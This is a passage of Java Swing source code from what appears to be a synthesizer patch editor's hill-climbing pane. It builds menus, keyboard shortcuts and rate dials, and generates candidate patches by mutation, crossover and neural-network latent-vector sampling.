selected[i].putClientProperty("JComponent.sizeVariant", "small"); vv.add(selected[i]); } hh.add(vv); vbox.add(hh); JMenuItem[] doItems = new JMenuItem[17]; doItems[0] = new JMenuItem("Keep Patch"); doItems[0].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { // Keep for sure? //if (synth.showSimpleConfirm("Keep Patch", "Load Patch into Editor?")) { synth.tabs.setSelectedIndex(0); synth.setSendMIDI(false); // push to undo if they're not the same if (!currentModels[_i].keyEquals(synth.getModel())) synth.undo.push(synth.getModel()); // Load into the current model currentModels[_i].copyValuesTo(synth.getModel()); synth.setSendMIDI(true); synth.sendAllParameters(); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[0].setEnabled(false); doItems[1] = new JMenuItem("Edit in New Editor"); doItems[1].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Synth newSynth = synth.doDuplicateSynth(); // Copy the parameters forward into the synth, then // link the synth's model back to currentModels[_i]. // We do this because the new synth's widgets are registered // with its model, so we can't just replace the model. // But we can certainly replace currentModels[_i]! newSynth.setSendMIDI(false); currentModels[_i].copyValuesTo(newSynth.getModel()); newSynth.setSendMIDI(true); currentModels[_i] = newSynth.getModel(); newSynth.sendAllParameters(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[1].setEnabled(false); doItems[2] = new JMenuItem("Save to File"); doItems[2].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.doSaveAs("" + stack.size() + "." + (_i < NUM_CANDIDATES ? (_i + 1) : ("A" + (_i - NUM_CANDIDATES + 1))) + "." + synth.getPatchName(synth.getModel()) + ".syx"); synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[2].setEnabled(false); doItems[3] = null; doItems[4] = new JMenuItem("Request Current Patch"); doItems[4].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receiveCurrent.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestCurrentPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Current Patch", "This synthesizer does not support requesting the current patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[4].setEnabled(false); doItems[5] = new JMenuItem("Request Patch..."); doItems[5].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { if (synth.receivePatch.isEnabled()) { menuButton = _i; startSoundsAgain = false; // we do this because some synths send data in chunks and in-between those // chunks we may send current patch and play it, messing up the chunk (such as on the JV-880) if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); startSoundsAgain = true; } synth.doRequestPatch(); // Notice we do NOT do updateAgain(); but we'll do it when the patch comes in } else { synth.showSimpleError("Cannot Request Patch", "This synthesizer does not support requesting a patch (sorry)."); } } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[5].setEnabled(false); doItems[6] = new JMenuItem("Load from File..."); doItems[6].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Model backup = synth.model; synth.model = currentModels[_i]; synth.setShowingLimitedBankSysex(true); synth.doOpen(false); synth.setShowingLimitedBankSysex(false); currentModels[_i] = synth.model; synth.model = backup; synth.updateTitle(); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[6].setEnabled(false); doItems[7] = new JMenuItem("Copy from Morph"); doItems[7].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { synth.setSendMIDI(false); synth.morph.current.copyValuesTo(currentModels[_i]); synth.setSendMIDI(true); } }); if (_i == NUM_CANDIDATES + ARCHIVE_SIZE) doItems[7].setEnabled(false); doItems[8] = null; doItems[9] = new JMenuItem("Nudge Candidates to Me"); doItems[9].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { Random random = synth.random; String[] keys = synth.getMutationKeys(); for(int i = 0; i < NUM_CANDIDATES; i++) { if (i == _i) continue; currentModels[i].recombine(random, currentModels[_i], keys, synth.nudgeRecombinationWeight).mutate(random, keys, synth.nudgeMutationWeight); } } }); doItems[10] = null; doItems[11] = new JMenuItem("Archive to q"); doItems[11].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 0] = (Model)(currentModels[_i].clone()); } }); doItems[12] = new JMenuItem("Archive to r"); doItems[12].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 1] = (Model)(currentModels[_i].clone()); } }); doItems[13] = new JMenuItem("Archive to s"); doItems[13].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 2] = (Model)(currentModels[_i].clone()); } }); doItems[14] = new JMenuItem("Archive to t"); doItems[14].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 3] = (Model)(currentModels[_i].clone()); } }); doItems[15] = new JMenuItem("Archive to u"); doItems[15].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 4] = (Model)(currentModels[_i].clone()); } }); doItems[16] = new JMenuItem("Archive to v"); doItems[16].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 5] = (Model)(currentModels[_i].clone()); } }); PushButton options = new PushButton("Options", doItems); options.getButton().setFocusable(false); vbox.add(options); return vbox; } public HillClimb(final Synth synth) { super(synth); method = new JComboBox(synth instanceof ProvidesNN ? new String[] { "Hill-Climber", "Constrictor", "NN Hill-Climber" } : new String[] { "Hill-Climber", "Constrictor" }); blank = new Blank(); addAncestorListener ( new AncestorListener () { public void ancestorAdded ( AncestorEvent event ) { requestFocusInWindow(); } public void ancestorRemoved ( AncestorEvent event ) { // will get removed } public void ancestorMoved ( AncestorEvent event ) { // don't care } } ); setFocusable(true); addKeyListener(new KeyListener() { public void keyPressed(KeyEvent e) { } public void keyReleased(KeyEvent e) { } public void keyTyped(KeyEvent e) { char c = e.getKeyChar(); if (c >= 'a' && c <= 'p') { int p = (int)(c - 'a'); plays[p].perform(); } else if (c >= 'A' && c <= 'P' && NUM_CANDIDATES == 32) { int p = (int)(c - 'A' + 16); plays[p].perform(); } else if ((c >= 'q' && c <= 'v')) { int p = (int)(c - 'q' + NUM_CANDIDATES); plays[p].perform(); } else if (c =='z') { int p = (int)(NUM_MODELS - 1); plays[p].perform(); } else if (c == ' ') { climb.perform(); } else if (c == KeyEvent.VK_BACK_SPACE) { back.perform(); } else if (c == KeyEvent.VK_ENTER) { retry.perform(); } else if (c >= '1' && c <= '3') { ratings[lastPlayedSound()][(int)(c - '1')].setSelected(true); } } }); ButtonGroup one = new ButtonGroup(); ButtonGroup two = new ButtonGroup(); ButtonGroup three = new ButtonGroup(); VBox top = new VBox(); HBox toprow = new HBox(); add(top, BorderLayout.CENTER); // add globals Category panel = new Category(null, "Iteration 1", Style.COLOR_GLOBAL()); iterations = panel; HBox iterationsBox = new HBox(); VBox vbox = new VBox(); // has to be first so others can have their size based on it back = new PushButton("Back Up") { public void perform() { pop(); resetCurrentPlay(); } }; back.getButton().setFocusable(false); outerBox = new VBox(); iterationsBox.add(outerBox); hillClimbBox = new VBox(); climb = new PushButton("Climb") { public void perform() { if (method.getSelectedIndex() == 2) // NN Climb { climbNN(); } else { climb(); } resetCurrentPlay(); } }; climb.getButton().setPreferredSize(back.getButton().getPreferredSize()); climb.getButton().setFocusable(false); hillClimbBox.add(climb); String s = synth.getLastX("HillClimbRate", synth.getClass().getName()); hillClimbRate = new LabelledDial("Mutation Rate", blank, "hillclimbrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "HillClimbRate", synth.getClass().getName()); } }; int v = INITIAL_HILL_CLIMB_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_HILL_CLIMB_RATE; hillClimbRate.setState(v); blank.getModel().set("hillclimbrate", v); hillClimbBox.add(hillClimbRate); constrictBox = new VBox(); constrict = new PushButton("Constrict") { public void perform() { constrict(); resetCurrentPlay(); } }; constrict.getButton().setPreferredSize(back.getButton().getPreferredSize()); constrict.getButton().setFocusable(false); constrictBox.add(constrict); s = synth.getLastX("ConstrictRate", synth.getClass().getName()); // we don't do this one anyway constrictRate = new LabelledDial("Mutation Rate", blank, "constrictrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "ConstrictRate", synth.getClass().getName()); } }; v = INITIAL_CONSTRICT_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_CONSTRICT_RATE; constrictRate.setState(v); blank.getModel().set("constrictrate", v); constrictBox.add(constrictRate); vbox = new VBox(); retry = new PushButton("Retry") { public void perform() { again(); resetCurrentPlay(); } }; retry.getButton().setPreferredSize(back.getButton().getPreferredSize()); retry.getButton().setFocusable(false); vbox.add(retry); // add the aforementioned Back up button vbox.add(back); reset = new PushButton("Reset...", new String[] { "From Original Patch", "From Morph", "From Nudge Targets", "From First Four Candidates", "From First Six Candidates" }) { public void perform(int val) { if (method.getSelectedIndex() == 2) // NN Climb { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end Model model = (val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null); produceNN(random, keys, weight, model); } else { initialize(val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null, val); } resetCurrentPlay(); } }; reset.getButton().setPreferredSize(back.getButton().getPreferredSize()); reset.getButton().setFocusable(false); vbox.add(reset); iterationsBox.add(vbox); panel.add(iterationsBox, BorderLayout.CENTER); s = synth.getLastX("HillClimbMethod", synth.getClass().getName()); method.setFont(Style.SMALL_FONT()); method.putClientProperty("JComponent.sizeVariant", "small"); method.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { int m = method.getSelectedIndex(); synth.setLastX("" + m, "HillClimbMethod", synth.getClass().getName()); setMethod(m); } }); v = 0; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 2) v = 0; // clear NN if (v == 2 && !(synth instanceof ProvidesNN)) v = 1; if (v == 0 || v == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } method.setSelectedIndex(v); JLabel methodLabel = new JLabel("Method: "); methodLabel.setForeground(Style.TEXT_COLOR()); methodLabel.setFont(Style.SMALL_FONT()); methodLabel.putClientProperty("JComponent.sizeVariant", "small"); methodLabel.setOpaque(false); // for windows HBox eb = new HBox(); eb.add(methodLabel); eb.add(method); // we do addLast rather than add to overcome the stupid OS X "Smoo..." bug. bigger = new JCheckBox("Big"); bigger.setFocusable(false); bigger.setOpaque(false); // for windows bigger.setForeground(Style.TEXT_COLOR()); bigger.setFont(Style.SMALL_FONT()); bigger.putClientProperty("JComponent.sizeVariant", "small"); s = synth.getLastX("HillClimbBigger", synth.getClass().getName()); bigger.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { setBigger(bigger.isSelected()); } }); boolean bb = false; if (s != null) try { bb = (s.equals("true")); } catch (Exception e) { Synth.handleException(e); } bigger.setSelected(bb); eb.addLast(bigger); panel.add(eb, BorderLayout.NORTH); toprow.add(panel); panel = new Category(null, "Archive", Style.COLOR_A()); HBox hbox = new HBox(); panel.add(hbox); for(int i = 0; i < ARCHIVE_SIZE; i++) { vbox = buildCandidate(NUM_CANDIDATES + i); hbox.add(vbox); } panel.add(hbox); toprow.addLast(panel); top.add(toprow); // Add Candidates panel = new Category(null, "Candidates", Style.COLOR_B()); hbox = new HBox(); candidates = new VBox(); for(int i = 0; i < NUM_CANDIDATES; i++) { vbox = buildCandidate(i); hbox.add(vbox); if (i % 8 == 7) { VBox vv = new VBox(); if (i != 7) vv.add(Strut.makeVerticalStrut(20)); vv.add(hbox); hbox = new HBox(); if (i == 23) extraCandidates1 = vv; else if (i == 31) extraCandidates2 = vv; else candidates.add(vv); } } panel.add(candidates, BorderLayout.WEST); HBox hb = new HBox(); hb.add(panel); VBox currentAndNone = new VBox(); // Add Current panel = new Category(null, "Current", Style.COLOR_C()); vbox = buildCandidate(NUM_MODELS - 1); HBox currentHBox = new HBox(); currentHBox.add(vbox); panel.add(currentHBox); currentAndNone.add(panel); // Add None panel = new Category(null, "None", Style.COLOR_C()); vbox = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][0] = new JRadioButton("1")); ratings[NUM_MODELS][0].setFocusable(false); ratings[NUM_MODELS][0].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][0].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][0].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][1] = new JRadioButton("2")); ratings[NUM_MODELS][1].setFocusable(false); ratings[NUM_MODELS][1].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][1].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][1].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][2] = new JRadioButton("3")); ratings[NUM_MODELS][2].setFocusable(false); ratings[NUM_MODELS][2].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][2].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][2].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); VBox bar = new VBox(); bar.addBottom(vbox); HBox foo = new HBox(); foo.add(bar); foo.add(Strut.makeHorizontalStrut(40)); panel.add(foo); currentAndNone.add(panel); hb.addLast(currentAndNone); top.add(hb); for(int i = 0; i < ratings.length; i++) { one.add(ratings[i][0]); two.add(ratings[i][1]); three.add(ratings[i][2]); } for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); setMethod(method.getSelectedIndex()); setBigger(bb); } public void setBigger(boolean bigger) { candidates.remove(extraCandidates1); candidates.remove(extraCandidates2); if (bigger) { candidates.add(extraCandidates1); candidates.add(extraCandidates2); } candidates.revalidate(); candidates.repaint(); synth.setLastX("" + bigger, "HillClimbBigger", synth.getClass().getName()); } public static final int UPDATE_SOUND_RATE = 1; int updateSoundTick = 0; Model backup = null; boolean isShowingPane() { return (synth.hillClimbPane != null && synth.tabs.getSelectedComponent() == synth.hillClimbPane); } public void updateSound() { updateSoundTick++; if (updateSoundTick >= UPDATE_SOUND_RATE) updateSoundTick = 0; if (updateSoundTick == 0) { if (isShowingPane()) { for(int i = 0; i < NUM_MODELS; i++) { plays[i].getButton().setForeground(new JButton().getForeground()); plays[i].getButton().setText(titleForButton(i)); } if (temporaryPlay >= 0) { plays[temporaryPlay].getButton().setForeground(Color.RED); plays[temporaryPlay].getButton().setText("<HTML><B>" + titleForButton(temporaryPlay) + "</b></HTML>"); backup = synth.model; synth.model = currentModels[temporaryPlay]; synth.sendAllParameters(); temporaryPlay = -1; } else { currentPlay++; if (currentPlay >= NUM_CANDIDATES || currentPlay >= 16 && !bigger.isSelected()) currentPlay = 0; plays[currentPlay].getButton().setForeground(Color.RED); plays[currentPlay].getButton().setText("<HTML><B>" + titleForButton(currentPlay) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. backup = synth.model; synth.model = currentModels[currentPlay]; synth.sendAllParameters(); } } } } void setMethod(int method) { boolean c = (method == 0 || method == 2); climb.getButton().setEnabled(c); constrict.getButton().setEnabled(!c); for(int i = 0; i < ratings.length; i++) for(int j = 0; j < ratings[i].length; j++) if (ratings[i][j] != null) ratings[i][j].setEnabled(c); for(int i = 0; i < selected.length; i++) if (selected[i] != null) selected[i].setEnabled(!c); hillClimbRate.setEnabled(c); constrictRate.setEnabled(!c); this.method.setSelectedIndex(method); outerBox.removeAll(); if (method == 0 || method == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } outerBox.revalidate(); repaint(); } int lastPlayedSound() { if (temporaryPlay >=0) return temporaryPlay; else return currentPlay; } public void postUpdateSound() { repaint(); if (backup != null) synth.model = backup; backup = null; } boolean startedUp = false; public void startup() { if (!startedUp) { resetCurrentPlay(); if (!synth.isSendingTestNotes() && synth.morphTestNotes) { synth.doSendTestNotes(); } } startedUp = true; } public void shutdown() { if (startedUp) { synth.doSendAllSoundsOff(false); if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); } if (synth.isRepeatingCurrentPatch()) { synth.doRepeatCurrentPatch(); } // restore patch synth.sendAllParameters(); } startedUp = false; } public void resetCurrentPlay() { currentPlay = NUM_CANDIDATES - 1; temporaryPlay = -1; } Model copy(Model model) { if (model != null) return model.copy(); else return null; } void again() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb): " + "Empty Stack"); return; } else if (operation == OPERATION_SEED_FROM_PATCH) { initialize(synth.getModel(), operation); } else if (operation == OPERATION_SEED_FROM_NUDGE || operation == OPERATION_SEED_FROM_FOUR || operation == OPERATION_SEED_FROM_SIX) { initialize(null, operation); } else if (operation == OPERATION_CLIMB) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climb(); } else if (operation == OPERATION_CONSTRICT) { /* State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) ratings[state.parentIndices[j]][j].setSelected(true); } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); constrict(); } else if (operation == OPERATION_CLIMB_NN) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climbNN(); } } void pop() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb) 2: " + "Empty Stack"); return; } else if (stackInitial()) { // do nothing ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); } else { ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); operation = state.operation; System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { //System.err.println("Setting " + state.parentIndices[j] + " to " + j); ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } iterations.setName("Iteration " + stack.size()); repaint(); } } public void startHillClimbing() { for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); if (method.getSelectedIndex() == 2) { //System.out.println(method.getSelectedIndex()); Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end produceNN(random, keys, weight, synth.getModel()); } else { initialize(synth.getModel(), OPERATION_SEED_FROM_PATCH); } } boolean[] getSelectedResults() { boolean[] sel = new boolean[NUM_CANDIDATES]; for(int i = 0; i < sel.length; i++) { sel[i] = selected[i].isSelected(); } return sel; } void initialize(Model seed, int operation) { // we need a model with NO callbacks stack.clear(); this.operation = operation; Random random = synth.random; String[] keys = synth.getMutationKeys(); switch(operation) { case OPERATION_SEED_FROM_PATCH: // Fall Thru case OPERATION_SEED_FROM_MORPH: { Model newSeed = seed.copy(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end int numMutations = 1; for(int i = 0; i < NUM_CANDIDATES; i++) { currentModels[i] = newSeed.copy(); for(int j = 0; j < numMutations; j++) currentModels[i] = currentModels[i].mutate(random, keys, weight); if (i % 4 == 3) numMutations++; } for(int i = 0; i < selected.length; i++) selected[i].setSelected(true); } break; case OPERATION_SEED_FROM_NUDGE: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; for(int i = 0; i < 4; i++) currentModels[i] = (Model)(synth.nudge[i].clone()); int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_FOUR: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_SIX: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 6; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; case OPERATION_SEED_FROM_LIBRARIAN: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int column = synth.librarian.getCurrentColumn(); int row = synth.librarian.getCurrentRow(); int len = synth.librarian.getCurrentLength(); if (len == 0) return; for(int i = 0; i < Math.min(len, 32); i++) { currentModels[i] = (Model)(synth.librarian.getLibrary().getModel(column - 1, row + i).clone()); } int m = len; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; } pushStack(new int[] {-1, -1, -1}, new Model[] { seed, null, null }, getSelectedResults(), currentModels); iterations.setName("Iteration " + stack.size()); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); repaint(); } void shuffle(Random random, Model[] array, int start, int len) { for (int i = len - 1; i > 0; i--) { int index = random.nextInt(i + 1); Model temp = array[start + index]; array[start + index] = array[start + i]; array[start + i] = temp; } } void produceNN(Random random, String[] keys, double weight, Model a) { if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } for(int i = 0; i < NUM_CANDIDATES; i++) { // A currentModels[i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, NUM_CANDIDATES); } void produceNN(Random random, String[] keys, double weight, Model a, Model b) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } for(int j = 0; j < numStages; j++) { for(int i = 0; i < STAGE_SIZE/2; i++) { // A currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = STAGE_SIZE/2; i < 3*STAGE_SIZE/4; i++) { // B currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = 3*STAGE_SIZE/4; i < STAGE_SIZE; i++) { // C currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produceNN(Random random, String[] keys, double weight, Model a, Model b, Model c) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } if(c.latentVector == null) { c.latentVector = ((ProvidesNN)synth).encode(c); } for(int j = 0; j < numStages; j++) { // A currentModels[j*STAGE_SIZE + 0] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 1] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 2] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 3] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // B currentModels[j*STAGE_SIZE + 4] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 5] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 6] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // C currentModels[j*STAGE_SIZE + 7] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 8] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, B) currentModels[j*STAGE_SIZE + 9] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 10] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, C) currentModels[j*STAGE_SIZE + 11] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 12] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(B, C) currentModels[j*STAGE_SIZE + 13] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 14] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A,B,C) currentModels[j*STAGE_SIZE + 15] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } 